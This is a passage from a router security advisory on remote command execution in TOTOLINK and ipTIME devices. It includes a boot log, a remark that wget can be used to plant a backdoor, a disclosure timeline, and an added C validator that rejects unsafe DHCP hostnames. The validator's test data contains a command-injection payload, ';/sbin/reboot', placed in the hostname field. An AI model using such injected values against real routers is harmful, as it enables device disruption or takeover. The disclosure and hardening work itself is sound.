Jan 1 00:00:25 miniupnpd[370]: HTTP listening on port 2048
Reaped 363
Led Silent Callback Turn ON All LED
Dynamic Channel Search for wlan0 is OFF
start_signal => plantynet_sync
Do start_signal => plantynet_sync
SIGNAL -> Config Update signal progress
killall: pppoe-relay: no process killed
SIGNAL -> WAN ip changed
Reaped 354
iptables: Bad rule (does a matching rule exist in that chain?)
ez_ipupdate callback --> time_elapsed: 1
Run DDNS by IP change: / 192.168.2.1
Burst DDNS Registration is denied: iptime -> now:26
Led Silent Callback Turn ON All LED
/proc/sys/net/ipv4/tcp_syn_retries: cannot create
- - - ---> Plantynet Event : 00000003
- - - ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE

[sending the DHCP request]

[01/Jan/2000:00:01:03 +0000]
[01/Jan/2000:00:01:03 +0000]
Jan 1 00:01:03 miniupnpd[370]: received signal 15, good-bye
Reaped 392
Reaped 318
Reaped 314
Reaped 290
Reaped 288
Reaped 268
Reaped 370
Reaped 367
- - - ---> PLANTYNET_SYNC_FREE_DEVICE
Restarting system.

Booting...

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@                                                                              @
@  chip__no  chip__id  mfr___id  dev___id  cap___id  size_sft  dev_size  chipSize
@  0000000h  0c84015h  00000c8h  0000040h  0000015h  0000000h  0000015h  0200000h
@  blk_size  blk__cnt  sec_size  sec__cnt  pageSize  page_cnt  chip_clk  chipName
@  0010000h  0000020h  0001000h  0000200h  0000100h  0000010h  000004eh  GD25Q16
@                                                                              @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Reboot Result from Watchdog Timeout!
- - - ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz)
Delay 1 second till reset button
Magic Number: raw_nv 00000000
Check Firmware(05020000) : size: 0x001ddfc8 ---->

[...]
```

An attacker can use the /usr/bin/wget binary located in the file system of the remote device to plant a backdoor and then execute it as root.

## Vendor Response

Due to "un-ethical code" found in TOTOLINK products (= backdoors found in new TOTOLINK devices), TOTOLINK was not contacted with regard to this case, but ipTIME was contacted in April 2015 concerning the first RCE.

## Report Timeline

* Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres in ipTIME products.
* Jun 02, 2014: Second RCE found by Pierre Kim in ipTIME products.
* Jun 25, 2015: Similar vulnerabilities found in TOTOLINK products.
* Jul 13, 2015: TOTOLINK silently fixed the HTTP RCE in A2004NS and EX750 routers.
* Jul 13, 2015: Updated firmware confirmed vulnerable.
* Jul 16, 2015: A public advisory is sent to security mailing lists.

## Credit

These vulnerabilities were found by Alexandre Torres and Pierre Kim (@PierreKimSec).

## References

https://pierrekim.github.io/advisories/2015-totolink-0x00.txt
https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html

## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
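Returning to the DHCP host-name injection described under "Details - RCE with a single DHCP request": the root cause is a DHCP server that copies the client-supplied host-name option (DHCP option 12) into a shell command line. The following is an added example, not code from the advisory or from the TOTOLINK/ipTIME firmware, of what the server side should do instead: extract option 12 from the options area with bounds checks, then accept it only if it is a syntactically valid RFC 1123 hostname, which by construction contains no shell metacharacters. The function names, the option-area layout helpers and both sample packets (one benign DHCPREQUEST, one carrying the advisory's `;/sbin/reboot` payload) are constructed for this illustration.

```c
/* Added example (not from the advisory or the vendor firmware): a strict
 * DHCP option 12 (host-name) extractor and validator that a DHCP server
 * should run before a client-supplied hostname reaches a lease file, a
 * hostname-registration hook or any command line.  All names below are
 * constructed for illustration. */
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DHCP_OPT_PAD       0
#define DHCP_OPT_HOST_NAME 12
#define DHCP_OPT_END       255
#define DHCP_MAX_HOSTNAME  253   /* RFC 1123 total length limit */
#define DHCP_MAX_LABEL     63    /* RFC 1123 per-label limit */

/* RFC 1123 hostname syntax: labels of [A-Za-z0-9-], 1..63 bytes, neither
 * starting nor ending with '-', joined by '.', total <= 253 bytes.  This
 * rejects every shell metacharacter (';', '|', '`', '$', '&', quotes, space). */
bool dhcp_hostname_is_valid(const char *name, size_t len)
{
    if (len == 0 || len > DHCP_MAX_HOSTNAME)
        return false;
    size_t label_len = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '.') {
            if (label_len == 0 || name[i - 1] == '-')
                return false;              /* empty label or label ending in '-' */
            label_len = 0;
            continue;
        }
        if (!(isalnum(c) || c == '-'))
            return false;                  /* anything outside [A-Za-z0-9-] */
        if (label_len == 0 && c == '-')
            return false;                  /* label must not start with '-' */
        if (++label_len > DHCP_MAX_LABEL)
            return false;
    }
    return label_len > 0 && name[len - 1] != '-';   /* no trailing '.' or '-' */
}

/* Walk the DHCP options area (bytes after the magic cookie) and copy the
 * host-name option into out, NUL-terminated.  Returns the hostname length,
 * 0 if the option is absent, or -1 if the area is malformed (a length byte
 * that runs past the buffer, or a hostname that does not fit in out). */
int dhcp_find_hostname(const uint8_t *opts, size_t optlen, char *out, size_t outsz)
{
    size_t pos = 0;
    while (pos < optlen) {
        uint8_t code = opts[pos];
        if (code == DHCP_OPT_END)
            return 0;
        if (code == DHCP_OPT_PAD) { pos++; continue; }   /* PAD has no length byte */
        if (pos + 1 >= optlen)
            return -1;                                   /* truncated TLV header */
        size_t len = opts[pos + 1];
        if (pos + 2 + len > optlen)
            return -1;                                   /* length runs past buffer */
        if (code == DHCP_OPT_HOST_NAME) {
            if (len >= outsz)
                return -1;
            memcpy(out, &opts[pos + 2], len);
            out[len] = '\0';
            return (int)len;
        }
        pos += 2 + len;
    }
    return 0;
}

/* Policy entry point: 1 = hostname present and safe to use, 0 = no hostname,
 * -1 = reject the request's hostname (malformed options or invalid syntax). */
int dhcp_check_request_hostname(const uint8_t *opts, size_t optlen)
{
    char name[DHCP_MAX_HOSTNAME + 1];
    int n = dhcp_find_hostname(opts, optlen, name, sizeof name);
    if (n <= 0)
        return n;
    if (strlen(name) != (size_t)n)      /* embedded NUL would hide trailing bytes */
        return -1;
    return dhcp_hostname_is_valid(name, (size_t)n) ? 1 : -1;
}

/* Constructed sample option areas (magic cookie already stripped): a
 * DHCPREQUEST from "laptop-01" and one carrying the advisory's payload. */
const uint8_t sample_benign[] = {
    53, 1, 3,                                        /* message type: REQUEST */
    12, 9, 'l','a','p','t','o','p','-','0','1',      /* host-name "laptop-01" */
    255
};
const uint8_t sample_injected[] = {
    53, 1, 3,
    12, 13, ';','/','s','b','i','n','/','r','e','b','o','o','t',
    255
};

int main(void)
{
    printf("benign:   %d\n", dhcp_check_request_hostname(sample_benign, sizeof sample_benign));
    printf("injected: %d\n", dhcp_check_request_hostname(sample_injected, sizeof sample_injected));
    return 0;
}
```

The validator is defence in depth, not the whole fix: a hostname that passes it is still data, and the server should write it into its lease file or hand it to a helper as an `execve` argument rather than interpolating it into a string given to `system()` or `popen()`. The bounds checks in `dhcp_find_hostname` matter on their own, since an option length byte that overruns the packet is the other classic way a DHCP options parser goes wrong.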
